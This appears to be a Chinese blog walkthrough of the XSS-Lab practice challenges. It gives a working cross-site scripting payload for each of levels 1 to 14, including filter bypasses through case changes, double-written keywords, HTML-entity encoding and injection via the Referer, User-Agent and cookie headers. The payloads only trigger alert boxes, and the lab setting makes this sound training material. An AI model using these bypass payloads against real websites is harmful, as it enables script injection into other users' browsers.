XSS-Lab

这一道题都有20关我真服了

level 1

查看源码

不难发现test会在页面里回显出来 所以我们直接再url里修改name的值

<script>alert(1)</script>

level 2

这里我们继续查看源码

我们继续使用 <script>alert()</script>

这里发现特殊的符号被转义了

我们重新构造payload "> <script>alert()</script> <"就通过了

level 3

这里我们发现不只是<>被实体化了 ' 也被实体化了

所以这道题需要运用到onfocus

我们构造payload ' onfocus=javascript:alert() '

然后再点击输入框获取焦点就通过了

onfocus

onfocus 是一个事件处理器属性,当 HTML 页面中的某个元素获得焦点时,会触发与之关联的事件处理函数。这个事件主要用于表单元素(如 <input><textarea><select>)和可聚焦的元素(如 <a> 链接、按钮等)

level4

这道题是双引号闭合 我们构造payload " onfocus=javascript:alert() "

level 5

这道题不仅过滤了js标签 还过滤了onfocus 我们采用 a herf 标签法

构造payload

复制代码
"> <a href=javascript:alert()>xxx</a> <"

构造好之后点击xss就好了

herf

href 是 HTML <a> 标签的属性,用于指定超链接的目标位置。它告诉浏览器当用户点击该链接时,应该跳转到哪里 href 可以指向网页、文件、电子邮件地址、电话号码,甚至是页面内的某个部分

level 6

这道题过滤了很多东西 但好像没过滤大小写 我们采用大小写绕过

构造payload "> <Script>alert()</Script><"

level 7

这里也是过滤了很多东西 我们采用双写绕过

构造payload

复制代码
"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level 8

这里需要知道herf可以自动unicode解码

制造payload javascript:alert()

编码过后

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

level 9

这道题过滤了 http://

制造payload javascript>alert()

这里我们需要经过html编码

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

level 10

没有输入的地方 我们查看源码

关键字

复制代码
" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

几乎都被实体化了 要使用get传参 这里还是要使用onfocus事件 因为没有输入框所以要加入type="text"

制造payload ?t_sort=" onfocus=javascript:alert() type="text

level 11

这里和上一道题差不多 就是需要用到refere头 传参

构造payload Referer: " onfocus=javascript:alert() type="text

Referer头的定义

Referer头是HTTP请求中的一个标头字段,用于指示当前请求的来源页面。通常由HTTP客户端(如浏览器)发送给服务器,帮助服务器了解用户是从哪个页面跳转而来的

level 12

这里是修改ua的参数完成注入 " onfocus=javascript:alert() type="text

level 13

名字为cook 考虑cookie 制造payload " onfocus=alert() type="text

level 14

这道题网站啥也没有 看下源码吧

level 15

我的出了点问题 第十五关 没跳转成功 下次再做吧

相关推荐
程序视点2 小时前
IObit Uninstaller Pro专业卸载,免激活版本,卸载清理注册表,彻底告别软件残留
前端·windows·后端
前端程序媛-Tian2 小时前
【dropdown组件填坑指南】—怎么实现下拉框的位置计算
前端·javascript·vue
嘉琪0012 小时前
实现视频实时马赛克
linux·前端·javascript
烛阴2 小时前
Smoothstep
前端·webgl
帽儿山的枪手3 小时前
HVV期间,如何使用SSH隧道绕过内外网隔离限制?
linux·网络协议·安全
柏峰电子3 小时前
市政道路积水监测系统:守护城市雨天出行安全的 “智慧防线”
大数据·人工智能·安全
上海云盾商务经理杨杨3 小时前
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
安全·网络安全
若梦plus3 小时前
Eslint中微内核&插件化思想的应用
前端·eslint
爱分享的程序员3 小时前
前端面试专栏-前沿技术:30.跨端开发技术(React Native、Flutter)
前端·javascript·面试
超级土豆粉3 小时前
Taro 位置相关 API 介绍
前端·javascript·react.js·taro